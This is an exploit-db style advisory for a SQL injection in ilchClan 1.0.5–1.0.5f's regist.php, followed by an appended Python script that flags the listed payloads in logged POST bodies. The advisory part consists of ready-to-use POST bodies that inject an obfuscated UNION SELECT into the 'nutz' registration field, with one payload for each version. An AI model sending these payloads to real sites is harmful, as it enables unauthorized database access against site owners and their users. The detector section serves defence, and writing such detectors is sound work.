ilchClan 1.0.5 – ‘regist.php’ SQL Injection

  • Author: Easy Laster
    Date: 2011-04-02
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/17101/
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
     Security Flaw in ilch clan 1.0.5 a,b,c,d,e,f! in regist.php
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    SQL Injection Vulnerability in ilch clan 1.0.5 a,b,c,d,e,f!
    Vulnerability Name   : Registration Bypass SQL Injection Vulnerability
    Date                 : 02.04.2011
    SQL Injection method : $_POST
    Discovered by        : Easy Laster
    Security Group       : Team-Internet, Undergroundagents, websec-empire.to and 4004-Security-Project.com
    Greetings to free-hack.com
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    
    Security Flaws
     =-=-=-=-=-=-=-=-=-=-=-=
     ilch clan 1.0.5
    checked=Gelesen+und+einverstanden&nutz=1'+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaa
     ilch clan 1.0.5a
    checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaa
     ilch clan 1.0.5b
    checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaa
     ilch clan 1.0.5c
    checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaa
     ilch clan 1.0.5d
    checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaaa
     ilch clan 1.0.5e
    checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa
     ilch clan 1.0.5f
    checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa
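
Added example (not part of the original advisory or of ilch's code): a Python check a defender could run over logged regist.php POST bodies to spot the `nutz` payloads listed above. It undoes the inline-comment and mixed-case obfuscation before matching; the function names and the two benign sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)   # /**/ used in place of spaces
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b")
LINE_COMMENT = re.compile(r"--(?:\s|$)")          # trailing "-- " terminator


def normalize(value):
    """Undo the obfuscation seen in the payloads: inline comments, mixed case, extra spaces."""
    value = INLINE_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip().lower()


def inspect_nutz(body):
    """Return the reasons a regist.php POST body resembles the injection in this advisory."""
    reasons = []
    # parse_qs URL-decodes the form body and turns '+' into spaces.
    for raw in parse_qs(body, keep_blank_values=True).get("nutz", []):
        norm = normalize(raw)
        if "'" in raw:
            reasons.append("quote")
        if INLINE_COMMENT.search(raw):
            reasons.append("inline-comment")
        if UNION_SELECT.search(norm):
            reasons.append("union-select")
        if LINE_COMMENT.search(norm):
            reasons.append("comment-terminator")
    return reasons


# The first two bodies are taken from the advisory; the last two are constructed benign samples.
SAMPLES = [
    "checked=Gelesen+und+einverstanden&nutz=1'+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaa",
    "checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaa",
    "checked=Gelesen+und+einverstanden&nutz=Max-Mustermann&email=max%40example.org",
    "checked=Gelesen+und+einverstanden&nutz=union_select_fan&email=fan%40example.org",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_nutz(body) or "clean", "<-", body)
```

Matching on the normalized value is what catches the `/**/UnIoN+/**/seLeCt` spelling; a plain case-sensitive search for `UNION SELECT` in the raw body would miss every payload listed here.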